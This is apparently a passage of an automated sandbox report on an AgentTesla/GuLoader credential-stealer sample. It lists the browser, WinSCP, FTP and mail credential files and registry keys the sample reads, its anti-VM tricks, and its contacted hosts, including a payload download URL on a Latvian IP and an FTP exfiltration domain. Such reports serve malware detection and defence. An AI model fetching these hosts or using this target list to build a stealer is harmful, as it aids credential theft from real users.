Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405F0A
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u9aPQQIwhj.exe PID: 7880, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u9aPQQIwhj.exe PID: 7880, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u9aPQQIwhj.exe PID: 7880, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546022 Sample: u9aPQQIwhj.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 17 ftp.concaribe.com 2->17 19 concaribe.com 2->19 21 api.ipify.org 2->21 29 Found malware configuration 2->29 31 Yara detected GuLoader 2->31 33 Yara detected AgentTesla 2->33 35 AI detected suspicious sample 2->35 7 u9aPQQIwhj.exe 2 32 2->7         started        signatures3 process4 file5 15 C:\Users\user\AppData\Local\...\System.dll, PE32 7->15 dropped 37 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->37 39 Tries to detect virtualization through RDTSC time measurements 7->39 41 Switches to a custom stack to bypass stack traces 7->41 11 u9aPQQIwhj.exe 15 8 7->11         started        signatures6 process7 dnsIp8 23 concaribe.com 192.185.13.234, 21, 62142 UNIFIEDLAYER-AS-1US United States 11->23 25 84.38.133.42, 62115, 80 DATACLUB-NL Latvia 11->25 27 api.ipify.org 172.67.74.152, 443, 62131 CLOUDFLARENETUS United States 11->27 43 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->43 45 Tries to steal Mail credentials (via file / registry access) 11->45 47 Tries to harvest and steal ftp login credentials 11->47 49 Tries to harvest and steal browser information (history, passwords, etc) 11->49 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
84.38.133.42
 unknown Latvia
203557 DATACLUB-NL false
192.185.13.234
 concaribe.com United States
46606 UNIFIEDLAYER-AS-1US true
172.67.74.152
 api.ipify.org United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
api.ipify.org 172.67.74.152 true
concaribe.com 192.185.13.234 true
ftp.concaribe.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
  • URL Reputation: safe
 unknown
http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.bin false
    		unknown